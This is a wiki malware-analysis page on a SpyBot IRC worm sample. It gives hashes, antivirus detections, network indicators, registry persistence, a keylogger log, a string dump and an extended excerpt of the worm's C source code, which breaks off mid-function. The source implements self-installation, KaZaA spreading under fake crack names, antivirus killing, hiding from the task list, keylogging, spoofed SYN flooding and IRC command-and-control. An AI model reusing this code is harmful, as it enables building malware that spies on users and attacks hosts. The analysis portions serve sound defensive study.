60e29751634c36ca26fd6acef4d9554e

From aldeid
Jump to: navigation, search

Description

Summary

  • creates a persistence registry key (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winsock driver)
  • the malware copies itself to several destinations in C:\WINDOWS\system32\kazaabackupfiles\ and C:\WINDOWS\system32\wuaumqr.exe
  • acts as a keylogger and logs the activity in C:\WINDOWS\system32\keylog.txt
  • connects to 209.126.201.20 over port 6667/tcp (IRC)

Identification

MD5 60e29751634c36ca26fd6acef4d9554e
SHA1 d7d3e9b5eb1f7afed668e87110a546f856331f68
SHA256 c6c9d204f39b8828c1b40a43b2cc3657a44bb44bcd7f1a098c41837eb99ec69a
ssdeep 768:SO3rw60+UzqkC6KpKF2knPOd8V2N2QplBZbZF6kf+hukceNYuKSgSEb6z1R88zx5:LrwvnmkC7pKFTnPOaV2N2QplBZbZF6kQ
imphash e28ca57ae83b0bd404f25671983f064d
File size 43.5 KB ( 44576 bytes )
File type Win32 EXE
Magic literal PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Antivirus detection

Antivirus Result Update
AVG Worm/Spybot 20140225
Ad-Aware Generic.Keylogger.2.98176F51 20140225
Agnitum Worm.Spybot.Gen.6 20140223
AntiVir TR/Drop.Agent.CR 20140225
Antiy-AVL Worm[P2P]/Win32.SpyBot 20140225
Avast Win32:SpyBot-gen2 [Wrm] 20140225
Baidu-International Worm.Win32.SpyBot.aX 20140225
BitDefender Generic.Keylogger.2.98176F51 20140225
Bkav W32.SpybotGP.Worm 20140224
CMC Generic.Win32.60e2975163!MD 20140220
Commtouch W32/Spybot.SUXQ-1100 20140225
Comodo Worm.Win32.SpyBot.N 20140225
DrWeb Win32.HLLW.SpyBot 20140225
ESET-NOD32 Win32/SpyBot.N 20140225
Emsisoft Generic.Keylogger.2.98176F51 (B) 20140225
F-Prot W32/Spybot.N 20140225
F-Secure Generic.Keylogger.2.98176F51 20140225
Fortinet W32/SpyBot.CBFD!worm 20140225
GData Generic.Keylogger.2.98176F51 20140225
Ikarus P2P-Worm.Win32.SpyBot 20140225
Jiangmin Worm/P2P.SpyBot.n 20140225
K7AntiVirus Riskware ( 9ae59fa10 ) 20140225
K7GW Backdoor ( 00005ea41 ) 20140225
Kaspersky P2P-Worm.Win32.SpyBot.gen 20140225
Kingsoft Worm.SpyBot.n.(kcloud) 20140225
Malwarebytes Trojan.Dropper 20140225
McAfee W32/Spybot.worm.gen.a 20140225
McAfee-GW-Edition W32/Spybot.worm.gen.a 20140225
MicroWorld-eScan Generic.Keylogger.2.98176F51 20140225
Microsoft Worm:Win32/Spybot.N 20140225
NANO-Antivirus Trojan.Win32.SpyBot.fxxc 20140225
Norman Backdoor 20140224
Panda Worm Generic 20140224
Rising PE:Worm.SpyBot!1.984D 20140223
Sophos W32/Spybot-Gen 20140225
Symantec W32.Spybot.Worm 20140225
TheHacker W32/Spybot.worm.gen 20140224
TotalDefense Win32/Spybot!generic 20140225
TrendMicro WORM_SPYBOT.AA 20140225
TrendMicro-HouseCall WORM_SPYBOT.AA 20140225
VBA32 Worm.SpyBot 20140224
VIPRE Trojan.Win32.Ircbot!cobra (v) 20140225
ViRobot Worm.Win32.SpyBot.44576 20140225
nProtect Worm/W32.SpyBot.44576.D 20140225
AhnLab-V3 20140224
ByteHero 20130613
CAT-QuickHeal 20140225
ClamAV 20140225
Qihoo-360 20140220
SUPERAntiSpyware 20140225

Defensive capabilities

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Dynamic analysis

Network indicators

IRC traffic

FakeNet confirms that the malware attempts to connect to 209.126.201.20:6667/tcp (IRC):

[Redirecting a socket destined for 209.126.201.20 to localhost.]

[Received new connection on port: 6667.]
SSL Autodetect: NOT SSL
[Received NON-SSL data on port 6667.]
 NICK malware51
 USER malware51 "hotmail.com" "127.0.0.1" :malware

Keylogger

GetKeyState / GetAsyncKeyState calls

60e29751634c36ca26fd6acef4d9554e-keylogger.png

Copies of the malware

The malware copies itself to:

  • C:\WINDOWS\system32\kazaabackupfiles\AVP_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\DreamweaverMX_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\EDU_Hack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\FlashFXP_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Generals_No-CD_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Norton_Anti-Virus_2002_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\PlanetSide.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Porn.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Postal_2_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Red_Faction_2_No-CD_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Renegade_No-CD_Crack.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Sitebot.exe
  • C:\WINDOWS\system32\kazaabackupfiles\Winamp_Installer.exe
  • C:\WINDOWS\system32\kazaabackupfiles\zoneallarm_pro_crack.exe
  • C:\WINDOWS\system32\wuaumqr.exe

Keylogger log file

The malware logs the activity to C:\WINDOWS\system32\keylog.txt. Here is what the file looks like:

[25:Feb:2014,  15:27:42] Keylogger Started

[15:30:29] C:\WINDOWS\system32\cmd.exe - CaptureBAT.exe -n -c              4 (Return)
[15:31:28] Sans titre - Bloc-notes                                         [Down][Home][Down][Down][Down][Down][Down][Down][Down][Down] (Changed window)
[15:31:30] Exécuter                                                        r[WIN]regedit (Changed window)
[15:31:38] ~res-x86.txt - Bloc-notes                                       [TAB][TAB][TAB][TAB] (Changed window)
[15:31:39] Exécuter                                                        r[WIN]regedit (Changed window)
[15:31:45] Exécuter                                                        r[WIN]regedit (Changed window)
[15:31:53] Exécuter                                                        r[WIN] (Changed window)
[15:31:54] Éditeur du Registre                                             [Print Screen] (Changed window)
[15:32:02] Exécuter                                                        r[WIN] (Changed window)

Registry keys

The following key is created to ensure persistence over reboots:

Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Name Winsock driver
Value wuaumqr.exe
Type REG_SZ

Static analysis

Sections

Name       VirtAddr     VirtSize     RawSize      Entropy     
--------------------------------------------------------------------------------
.text      0x1000       0x6f54       0x6f54       6.001816    
.bss       0x8000       0x93c4       0x0          0.000000
.data      0x12000      0x1d24       0x1d24       4.688955    
.idata     0x14000      0xd68        0xd68        4.856590    
.rsrc      0x15000      0xd68        0xd68        5.586022

IAT

Module Function
ADVAPI32.DLL
CRTDLL.DLL
KERNEL32.DLL
SHELL32.DLL
USER32.DLL
winmm.dll
wsock32.dll

Strings

t ;t$$t
SVWUj
]_^[
SVWU
t:VU
t(x1
]_^[
=, A
h( A
h$ A
h  A
5( A
5$ A
5  A
SVWh
h8 A
58 A
h8 A
Wh8 A
ht A
h|9A
hn9A
h`9A
hb9A
PhE9A
h`9A
hA9A
h99A
PVh29A
h/9A
PSh 9A
t&Shp
"j2j
hi8A
h`9A
h[8A
hJ8A
h<8A
h28A
Wh+8A
Wh+8A
u&h{7A
hc7A
hO7A
h97A
h-7A
h$7A
h"7A
h 7A
[email protected]
h'(A
Wh'(A
h:;A
h`9A
h`9A
PhH6A
h`9A
[email protected]
t%h`9A
|h/9A
PSh 9A
h` A
h8 A
h8 A
h` A
h` A
h8 A
h8 A
h` A
_^[]
SVWjdj
h'(A
h'(A
h'(A
5L(A
tvjF
Php5A
Phe5A
ShP5A
Ph=5A
Ph-5A
Ph"5A
@_^[
5L,A
<>/t
Phm4A
hj4A
PShW4A
hl3A
hg3A
@Ph]3A
hY3A
hU3A
t hS A
hH A
hH3A
hH A
h>3A
h:3A
h63A
h,3A
h(3A
hj:A
h#3A
h&8A
hH A
[email protected] A
hH A
hH3A
hf:A
hD A
uA9E
h 9A
SVWj2j
h7(A
h7(A
h'(A
Rhv2A
he2A
hX2A
h52A
h%2A
h!2A
h%2A
u3hX2A
h'(A
Wh'(A
hb:A
Whz A
@_^[
5t-A
hx0A
hp0A
h?0A
h:0A
vOh:0A
h/9A
h00A
Phe/A
SVW1
Pha/A
\Ph^/A
hY/A
hp:A
SVWj
Y_^[
<>\u
SPhR/A
Rh&/A
Rhe.A
Ph<.A
h0.A
Ph^/A
h,.A
h%.A
8ERRRu
UPDF
RUNF
QUITj
h`9A
[email protected]
h^/A
SVW1
[email protected]
% CA
%$CA
%(CA
%,CA
%0CA
%4CA
%8CA
%<CA
%HCA
%TCA
?"u#j"
%`CA
%dCA
%hCA
%lCA
%pCA
%tCA
%xCA
%|CA
% DA
%$DA
%(DA
%,DA
%0DA
%4DA
%8DA
%<DA
%@DA
%LDA
%PDA
%TDA
%XDA
%\DA
%`DA
%dDA
%pDA
%tDA
%xDA
%|DA
wuaumqr.exe
#|-|xXx|-|
xTriplex
Winsock driver
krnel
xXx - Triple Threat - xXx
keylog.txt
tsm~
tsm~
Error operation failed
Operation completed
000.000.000.000
File doesn't exists
Searsing for passwords
PRIVMSG %s :%s
Proccess has terminated
Could not read data from proccess
\cmd.exe
c:\%s.exe
SFT05%i
connected.
PWD14438136782715101980
PWD715
%i.%i.%i.%i
Server uploaded to kuangserver IP: %s 
PRIVMSG %s :Server uploaded to kuangserver IP: %s 
Server uploaded to sub7server IP: %s port: %i
PRIVMSG %s :Server uploaded to sub7server IP: %s port: %i
Found poort %i open at ip:%s 
PRIVMSG %s :Found poort %i open at ip:%s 
%s:%i
%s%s
HTTP/1.0 200 OK
Server: SpyBot1.2
Date: %s %s GMT
Content-Type: %s
Accept-Ranges: bytes
Last-Modified: %s %s GMT
Content-Length: %i
Connection: close
ddd, dd MMM yyyy
application/octet-stream
text/html
GET 
HTTP server listining on poort: %i root dir: %s\
%s %s
PRIVMSG %s :%s %s
PRIVMSG %s :%s
WNetEnumCachedPasswords
MPR.DLL
Version:%s cpu: %dMHz. ram: %dMB total, %dMB free  %d%s in use os: Windows %s (%d.%d, build %d). uptime: %dd %dh %dm. Date: %s Time: %s Current user: %s IP address: %s Hostname: %s Windir: %s\ Systemdir: %s\
HH:mm:ss
dd:MMM:yyyy
couldn't resolve host
%s [%s]
2000
Transfer complete (size: %i bytes)
Error connecting
Error with file
Transfer complete (send: %i bytes)
Socket error
Dcc send timeout
DCC SEND %s %i %i %i
Type list path+filter to get my file list
Example:
list C:\*.*
$CHAN
%s%s%s
$NICK
login
PRIVMSG
KICK
PART
NICK
NICK %s
JOIN %s
JOIN %s %s
PONG %s
PING
Found: %i files and %i dirs
</PRE></HTML>
PRIVMSG %s :Found %i files and %i dirs
%s  (%i bytes)
<p><A href="%s%s">%s</A> (%i bytes)
PRIVMSG %s :%s (%i bytes)
<%s>
<li><A href="%s%s/">%s</A></li> <b><u>(Directory)</b></u>
PRIVMSG %s :[%s]
<li><A href="%s">Parent Directory</A></li>
Searsing for: %s
<HTML><PRE>
PRIVMSG %s :Searsing for: %s
PRIVMSG %s :%s
PRIVMSG %s :(%s)
10  %s
(%s) 
10 %s
[HH:mm:ss] 
%s (Return
%s (Buffer full
%s (Changed window
 Keylogger Started
 HH:mm:ss]
[dd:MMM:yyyy, 
NICK %s
 USER %s "hotmail.com" "%s" :%s
%d.%d.%d.%d
%s%i
Administrator
more
SynFlooding: %s port: %i delay: %i times:%i.
bla bla blaaaasdasd
Portscanner startip: %s port: %i delay: %ssec.
Portscanner startip: %s port: %i delay: %ssec. logging to: %s
kuang
sub7
%i.%i.%i.0
scan
redirect %s:%i > %s:%i
redirect
CHAT
SEND
rename
%s Address http://%s:%i/ .
%s %s
httpserver
Thread killed (%s)
killthread
sendkeys
killprocess
set CDAudio door open
cd-rom drive opened
set CDAudio door closed
cd-rom drive closed
cd-rom
list
makedir
execute
delete
cmd.exe has started type "cmd help" for commands
opencmd
QUIT Bye Bye
reboot
quit
disconnect
keyboardlights
QUIT
QUIT
reconnect
listprocesses
Keylogger stoped
stopkeylogger
Keylogger logging to %s
Keylogger active output to: DCC chat
Keylogger active output to: %s
error already logging keys to %s use "stopkeylogger" to stop
startkeylogger
passwords
info
PRIVMSG %s :%s
%i: %s
threads
Keylogger logging to %s\%s
F/AV Killer
Process32Next
Process32First
CreateToolhelp32Snapshot
RegisterServiceProcess
kernel32.dll
open
Dir0
SOFTWARE\KAZAA\LocalContent
012345:%s
%s\kazaabackupfiles\
%s\%s
[Num Lock]
[Down]
[Right]
[Up]
[Left]
[Pg Dn]
[End]
[Del]
[Pg Up]
[Home]
[Insert]
[Scroll Lock]
[Print Screen]
[WIN]
[CTRL]
[TAB]
[F12]
[F11]
[F10]
[F9]
[F8]
[F7]
[F6]
[F5]
[F4]
[F3]
[F2]
[F1]
[ESC]
EDU_Hack.exe
Sitebot.exe
Winamp_Installer.exe
PlanetSide.exe
DreamweaverMX_Crack.exe
FlashFXP_Crack.exe
Postal_2_Crack.exe
Red_Faction_2_No-CD_Crack.exe
Renegade_No-CD_Crack.exe
Generals_No-CD_Crack.exe
Norton_Anti-Virus_2002_Crack.exe
Porn.exe
AVP_Crack.exe
zoneallarm_pro_crack.exe
NETSTAT.EXE
TASKMGR.EXE
MSCONFIG.EXE
REGEDIT.EXE
MODE $CHAN +ntsm
MODE $NICK +i
209.126.201.22
209.126.201.20
WSACleanup
WSAGetLastError
WSAStartup
__WSAFDIsSet
accept
bind
closesocket
connect
gethostbyaddr
gethostbyname
getpeername
getsockname
htonl
htons
inet_addr
inet_ntoa
ioctlsocket
listen
ntohs
recv
select
send
socket
ShellExecuteA
mciSendStringA
ExitProcess
FindClose
FindFirstFileA
FindNextFileA
FreeLibrary
GetCommandLineA
GetCurrentProcess
GetDateFormatA
GetExitCodeProcess
GetFileAttributesA
GetFileSize
GetLastError
GetModuleFileNameA
GetModuleHandleA
CloseHandle
GetProcAddress
GetSystemDirectoryA
GetTickCount
GetTimeFormatA
GetVersionExA
GetWindowsDirectoryA
GlobalMemoryStatus
CopyFileA
LoadLibraryA
CreateDirectoryA
MoveFileA
OpenProcess
PeekNamedPipe
CreateFileA
ReadFile
RtlUnwind
SetFileAttributesA
SetFilePointer
CreateMutexA
Sleep
TerminateProcess
TerminateThread
CreatePipe
CreateProcessA
WriteFile
lstrcpyA
lstrcpynA
lstrlenA
CreateThread
DeleteFileA
DuplicateHandle
GetWindowTextA
GetForegroundWindow
GetKeyState
GetAsyncKeyState
MapVirtualKeyA
ExitWindowsEx
CharUpperBuffA
CharToOemA
keybd_event
GetUserNameA
RegCreateKeyA
RegCreateKeyExA
RegCloseKey
RegOpenKeyA
RegQueryValueExA
RegSetValueExA
__GetMainArgs
atoi
exit
fclose
fopen
fputc
fputs
fread
fwrite
malloc
memcpy
memset
raise
rand
signal
sprintf
srand
strcat
strchr
strcmp
strncpy
strstr
strtok
wsock32.dll
SHELL32.DLL
winmm.dll
KERNEL32.DLL
USER32.DLL
ADVAPI32.DLL
CRTDLL.DLL
aZNKJJ==b
aa^I
aj<65KK466
ac;81
2?46
 18>o
 /7CCBX
GC71
w27CBLOR
FC?89
wC?BMRRVn
ROFCX
w?CORV^^k
wCOR\_]
wMO_X
nkjj
ovuif
ztiv
!!&,*&
!$++&#
<#*,'#
',*$
ie[k|
!&,+&
iee|
!&+,'#

Source code

   1 //////////////////////////////////////////////////////////
   2 //							//
   3 //		Spybot1.2b beta by Mich			//
   4 //							//
   5 //		Opensource irc bot 			//
   6 //							//
   7 //	    IRC: irc.babbels.com #dreams		//
   8 //	    						//
   9 //	http://members.lycos.co.uk/ircspybot/		//
  10 //	    						//
  11 //	      [email protected]		//
  12 //	    						//
  13 //		use at your own risk.			//
  14 //							//
  15 //	       Good luck and have fun!			//
  16 //							//
  17 //////////////////////////////////////////////////////////
  18 
  19 #define WIN32_LEAN_AND_MEAN
  20 
  21 #include <winsock2.h>
  22 #include <stdio.h>
  23 #include <shellapi.h>
  24 #include <wininet.h>
  25 #include <mmsystem.h>
  26 #include "settings.h"
  27 
  28 char nick[100];
  29 char realname[250];
  30 char runoncekey[] = "tpguxbsf}nŠ„“”‡•}xŠ…˜”}d–““†•w†“”Š}s–p„†";
  31 char runkey[] = "tpguxbsf}nŠ„“”‡•}xŠ…˜”}d–““†•w†“”Š}s–";
  32 
  33 //variables
  34 
  35 char dcchost[20];
  36 char dccfilename[MAX_PATH];
  37 char sendtochan[50];
  38 int dccport;
  39 int redirect_to_port;
  40 SOCKET redirectsock_in;
  41 SOCKET dcchosts;
  42 SOCKET dccspy = 0;
  43 BOOL info = FALSE;
  44 HANDLE pipe_read;
  45 HANDLE pipe_write;
  46 HANDLE pipe_Hproc;
  47 HANDLE hChildInWrDupe;
  48 SOCKET pipesock;
  49 char pipe_chan[50]; 
  50 char IRC_server[500];
  51 
  52 
  53 #ifdef SYN_FLOOD
  54 DWORD WINAPI syn_flood(LPVOID param);
  55 
  56 typedef struct syn_struct {
  57 	char host[100];
  58 	int port;
  59 	int delay;
  60 	int times;
  61 	int thread;
  62 	int state;
  63 } syndata;
  64 
  65 syndata syn[30];
  66 
  67 #endif
  68 
  69 #ifdef SPOOFD_SYNFLOOD
  70 
  71 //Spoofd synflood source comes from teslas sdbot edition i have only changed some think (its better) 
  72 
  73 DWORD WINAPI Spoofd_syn(LPVOID param);
  74 
  75 typedef struct Spoofd_syn_struct {
  76 	unsigned long TargetIP;
  77 	int port;
  78 	int delay;
  79 	int times;
  80 	int thread;
  81 	int state;
  82 	SOCKET sock;
  83 } Spoofd_syndata;
  84 
  85 Spoofd_syndata Spoofdsyn[30];
  86 
  87 #define IP_HDRINCL 2 
  88 
  89 typedef struct ip_hdr 
  90 { 
  91 	unsigned char h_verlen; 
  92 	unsigned char tos; 
  93 	unsigned short total_len; 
  94 	unsigned short ident; 
  95 	unsigned short frag_and_flags; 
  96 	unsigned char ttl; 
  97 	unsigned char proto; 
  98 	unsigned short checksum; 
  99 	unsigned int sourceIP; 
 100 	unsigned int destIP; 
 101 }IPHEADER; 
 102 
 103 typedef struct tsd_hdr 
 104 { 
 105 	unsigned long saddr; 
 106 	unsigned long daddr; 
 107 	char mbz; 
 108 	char ptcl; 
 109 	unsigned short tcpl; 
 110 }PSDHEADER; 
 111 
 112 typedef struct tcp_hdr 
 113 { 
 114 	USHORT th_sport; 
 115 	USHORT th_dport; 
 116 	unsigned int th_seq; 
 117 	unsigned int th_ack; 
 118 	unsigned char th_lenres; 
 119 	unsigned char th_flag; 
 120 	USHORT th_win; 
 121 	USHORT th_sum; 
 122 	USHORT th_urp; 
 123 }TCPHEADER; 
 124 
 125 
 126 USHORT checksum(USHORT *buffer, int size) 
 127 { 
 128 	unsigned long cksum=0; 
 129 	while(size >1) 
 130 	{ 
 131 		cksum+=*buffer++; 
 132 		size -=sizeof(USHORT); 
 133 	} 
 134 	if(size ) 
 135 	{ 
 136 		cksum += *(UCHAR*)buffer; 
 137 	} 
 138 
 139 	cksum = (cksum >> 16) + (cksum & 0xffff); 
 140 	cksum += (cksum >>16); 
 141 	return (USHORT)(~cksum); 
 142 } 
 143 
 144 #endif
 145 
 146 #ifdef SUB7_SPREADER
 147 int sub7(SOCKET sock);
 148 #endif
 149 
 150 #ifdef KUANG2_SPREADER
 151 int KUANG(SOCKET sock);
 152 #endif
 153 
 154 char logins[maxlogins][50]={ 0 };
 155 int sendkeysto = 0;
 156 DWORD nSize = 240;
 157 SOCKET keysock;
 158 char keylogchan[50];
 159 int distime = 1800000;
 160 const char Error[] = "Error operation failed";
 161 const char OK[] = "Operation completed";
 162 char IP[] = "000.000.000.000";
 163 const char No_File[] = "File doesn't exists";
 164 
 165 // function prototypes
 166 DWORD WINAPI download(LPVOID param);
 167 char * Regreadkey(int num);
 168 void regwritekey(char *serv,int num);
 169 DWORD WINAPI port_redirect(LPVOID param);
 170 SOCKET Listen(int port);
 171 SOCKET create_sock(char *host, int port);
 172 void Close_Handles();
 173 DWORD WINAPI PipeReadThread(LPVOID param);
 174 int pipe_send(SOCKET sock,char *chan,char *buf);
 175 int open_cmd(SOCKET sock,char * chan);
 176 DWORD WINAPI PipeReadThread(LPVOID param);
 177 void Keyevent (BYTE key,BOOL caps);
 178 int HTTP_server(char *dir,int poort);
 179 DWORD WINAPI port_scanner(LPVOID param);
 180 DWORD WINAPI HTTP_server_thread(LPVOID Param);
 181 DWORD WINAPI HTTP_server_to_guest(LPVOID Param);
 182 int Check_Requestedfile(SOCKET sock,char * dir,char * rFile);
 183 int getfiles(char *current,SOCKET dccsock,char *chan,char *URL);
 184 DWORD WINAPI  http_header(LPVOID param);
 185 void http_send_file(SOCKET sock,char *file);
 186 char * file_to_html(char *file);
 187 int cashedpasswords(SOCKET sock,char *sendto);
 188 char * decrypt(char *str,int key);
 189 void writekeys(BOOL uninstall);
 190 void randnick();
 191 void raw_commandsonjoin(SOCKET sock,char *chan);
 192 void raw_commands(SOCKET sock);
 193 int sendkeys(SOCKET sock,char *buf,char *window,char *logfile);
 194 int irc_connect(char * serveraddr,int poort);
 195 int read_command(SOCKET sendsock,SOCKET ircsock,char *command,char *line,char *sendto);
 196 int irc_read(SOCKET Server);
 197 int irc_readline(char * line,SOCKET Server);
 198 char * sysinfo(char *sinfo,SOCKET sock);
 199 int cpuspeed(void);
 200 unsigned __int64 cyclecount();
 201 DWORD WINAPI dcc_send(LPVOID param);
 202 DWORD WINAPI dcc_chat(LPVOID param);
 203 DWORD WINAPI dcc_getfile(LPVOID param);
 204 DWORD WINAPI keylogger(LPVOID param);
 205 DWORD WINAPI kill_av(LPVOID param);
 206 DWORD WINAPI keepkeys(LPVOID param);
 207 int listProcesses(SOCKET sock,char *chan,char *proccess,BOOL killthread);
 208 int scan_host(char *host,int port,int num);
 209 void GetNewIp(int num);
 210 int addthread(char *name,SOCKET sock,HANDLE Threat_Handle,int id,char * dir);
 211 
 212 
 213 typedef struct scan_struct {
 214 	char file[MAX_PATH];
 215 	char ip[16];
 216 	char chan[30];
 217 	int port;
 218 	int delay;
 219 	int state; //0 = empty, 1 = active thread
 220 	int extra;
 221 	int thread;
 222 	SOCKET sock;
 223 	int scan_1;
 224 	int scan_2;
 225 	int scan_3;
 226 	int scan_4;
 227 } scandata;
 228 
 229 scandata scan[10];
 230 
 231 
 232 
 233 typedef struct threads_struct {
 234 	char name [250];
 235 	int id; //1 = firewall/AV killer, 2 = Keylogger, 3 = HTTP server, 4 = Port scanner 5 = synflood,6 = redirect
 236 	int num;
 237 	int port;
 238 	SOCKET sock;
 239 	HANDLE Threat_Handle;
 240 	char dir[MAX_PATH];
 241 	char file[MAX_PATH];
 242 } thread;
 243 
 244 thread threads[40];
 245 
 246 
 247 // kernel32.dll typedefs/structs
 248  typedef struct tagPROCESSENTRY32 {
 249 	DWORD dwSize;
 250 	DWORD cntUsage;
 251 	DWORD th32ProcessID;
 252 	DWORD *th32DefaultHeapID;
 253 	DWORD th32ModuleID;
 254 	DWORD cntThreads;
 255 	DWORD th32ParentProcessID;
 256 	LONG pcPriClassBase;
 257 	DWORD dwFlags;
 258 	CHAR szExeFile[MAX_PATH];
 259  } PROCESSENTRY32, *LPPROCESSENTRY32;
 260 
 261  typedef int (__stdcall *RSP)(DWORD, DWORD);
 262  RSP fRegisterServiceProcess;
 263  typedef HANDLE (__stdcall *CT32S)(DWORD,DWORD);
 264  CT32S fCreateToolhelp32Snapshot;
 265  typedef BOOL (__stdcall *P32F)(HANDLE,LPPROCESSENTRY32);
 266  P32F fProcess32First;
 267  typedef BOOL (__stdcall *P32N)(HANDLE,LPPROCESSENTRY32);
 268  P32N fProcess32Next;
 269 
 270 
 271  int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
 272  {
 273 	WSADATA  WSData;
 274 	int err, c, x;
 275 	DWORD id;
 276 	HANDLE Threat_Handle;
 277 	char thisfilename[MAX_PATH];
 278 	char sysdir[MAX_PATH];
 279 	char buf[250];
 280 	GetModuleFileName(NULL,thisfilename,sizeof(thisfilename));
 281 	GetSystemDirectory(sysdir, sizeof(sysdir));  
 282 	decrypt(runoncekey,33); //decrypt the startup keys some virus scanners use the startup keys as a signature
 283 	decrypt(runkey,33);
 284 	if (strstr(thisfilename,sysdir) == NULL) //instal server
 285 	{
 286 		char copyfile[MAX_PATH]; 
 287 		sprintf(copyfile,"%s\\%s",sysdir,filename);
 288 		while (!CopyFile(thisfilename,copyfile , FALSE)) { //copyfile to systemdir 
 289 			srand(GetTickCount());
 290            	       	for (x=0;x<strlen(filename)-4;x++)
 291 				filename[x] = (rand()%26)+97;//we could not copy the file so we try a other filename
 292 			sprintf(copyfile,"%s\\%s",sysdir,filename);
 293 		}
 294 		SetFileAttributes(copyfile,FILE_ATTRIBUTE_HIDDEN); //set fileatribures to hidden 
 295 		
 296 		//SetFileAttributes(copyfile,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY); //set fileatribures to hidden readonly and system
 297 		writekeys(FALSE); //write startupkeys
 298 		#ifdef KAZAA_SPREADER
 299 		HKEY	hkeyresult;
 300 		char tstr[MAX_PATH];
 301 		char tstr2[MAX_PATH];
 302 		char tstr3[MAX_PATH];
 303 		sprintf(tstr3, "%s\\kazaabackupfiles\\", sysdir); //dir where we put the files in
 304   		sprintf(tstr, "012345:%s",tstr3); //registry key so or new dir will be a shared dir
 305 		CreateDirectory(tstr3, 0);//create the directory
 306 		//write the keys
 307 		RegCreateKey(HKEY_CURRENT_USER, (LPCTSTR) "SOFTWARE\\KAZAA\\LocalContent", &hkeyresult); 
 308 		RegCloseKey (hkeyresult);
 309 		RegOpenKey (HKEY_CURRENT_USER, (LPCTSTR) "SOFTWARE\\KAZAA\\LocalContent", &hkeyresult);
 310              	RegSetValueEx(hkeyresult, "Dir0", 0, REG_SZ, (const unsigned char *)tstr, 127);
 311 		RegCloseKey(hkeyresult); 
 312 		//copy all the files
 313              	for (x=0;kazaa_files[x] != NULL; x++) 
 314 	     	{
 315 			memset(tstr2,0,sizeof(tstr2));
 316 			sprintf(tstr2, "%s\\%s", tstr3,kazaa_files[x]);
 317 			CopyFile(thisfilename, tstr2, FALSE);
 318 	    	}
 319 		#endif
 320 		ShellExecute(0, "open",copyfile , NULL, NULL, SW_SHOW);
 321 		ExitProcess(0);
 322 	}
 323 	sprintf(filename,strlen(thisfilename)-strlen(filename)+thisfilename);
 324         CreateMutex(NULL,TRUE,mutexname);
 325 	if (GetLastError() == ERROR_ALREADY_EXISTS) ExitProcess(0); //check if is allready running..
 326 	HINSTANCE kernel32_dll = LoadLibrary("kernel32.dll");
 327 	if (kernel32_dll) { //thanks to sdbot
 328 		fRegisterServiceProcess = (RSP)GetProcAddress(kernel32_dll, "RegisterServiceProcess");
 329 		if (fRegisterServiceProcess) fRegisterServiceProcess(0, 1); //hide from ctrl alt del
 330 		fCreateToolhelp32Snapshot = (CT32S)GetProcAddress(kernel32_dll, "CreateToolhelp32Snapshot"); 
 331 		fProcess32First = (P32F)GetProcAddress(kernel32_dll, "Process32First");
 332 		fProcess32Next = (P32N)GetProcAddress(kernel32_dll, "Process32Next");
 333 	}
 334    	if (WSAStartup(MAKEWORD(1, 1), &WSData))
 335 		if (WSAStartup(MAKEWORD(1, 0), &WSData))
 336         		ExitProcess(0);
 337 	for (c=0;c <= 10;c++)
 338 		scan[c].state = 0;
 339 	for (c=0;c < 40;c++)
 340 		threads[c].id = 0;
 341 	#ifdef SYN_FLOOD
 342 	for (c=0;c <= 30;c++)
 343 		syn[c].state = 0;
 344 	#endif
 345 
 346 	#ifdef Use_Firewall_killer
 347 	Threat_Handle = CreateThread(NULL, 0, &kill_av, NULL, 0, &id);
 348 	addthread("F/AV Killer",0,Threat_Handle,1,"\0");
 349 	#endif
 350 
 351 	CreateThread(NULL, 0, &keepkeys, NULL, 0, &id);
 352 	memset(keylogchan,0,sizeof(keylogchan));
 353 
 354 	#ifdef start_keylogger_afterstartup
 355 	Threat_Handle = CreateThread(NULL, 0, &keylogger, NULL, 0, &id);
 356 	sprintf(buf,"Keylogger logging to %s\\%s",sysdir,keylogfilename);
 357 	addthread(buf,0,Threat_Handle,2,"\0");
 358 	#endif
 359 
 360 ////////////////////////decrypt some data, make sure before you enable this that you first encrypt al data with the provided mIRC script /////////////////////////////////////
 361 
 362 	//decrypt(password,decryptkey);
 363 	//decrypt(channelpass,decryptkey);
 364 	//decrypt(channel,decryptkey);
 365 //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
 366 
 367 	#ifdef Check_for_internetconnection
 368 	DWORD ConState;
 369 	while (1) {
 370 		if (!InternetGetConnectedState(&ConState,0)) { //see if we there is a internet connection
 371 			Sleep(30000); 
 372 			continue;
 373 		}
 374 		break; //there is a connection 
 375 	}
 376 	#endif
 377 
 378 	#ifdef start_httpserver_afterstartup 
 379 	HTTP_server(root_dir,http_poort);
 380 	#endif
 381 	c = 0;
 382 	while (1) {
 383 		if (ircservers[c] == NULL) c = 0;
 384  		err = irc_connect(ircservers[c],serverports[c]);
 385 		if (err == 1) break;
 386 		Sleep(5000);
 387 		c++;
 388 	}
 389 	WSACleanup();
 390 
 391 	#ifdef remote_cmd
 392 	Close_Handles();
 393 	#endif
 394 
 395 	ExitProcess(0);
 396 	return 0;
 397  }
 398 
 399 int read_command(SOCKET sendsock,SOCKET ircsock,char *command,char *line,char *sendto)
 400 {
 401 	char x[512];
 402 	char y[512];
 403 	char line1[512];
 404 	char *s[10];
 405 	int i,c;
 406 	int err;
 407 	DWORD id;
 408 	char buf[512];
 409 	memset(x,0,sizeof(x));
 410 	memset(line1, 0, sizeof(line1));
 411 	strncpy(line1, line, sizeof(line1)-1);
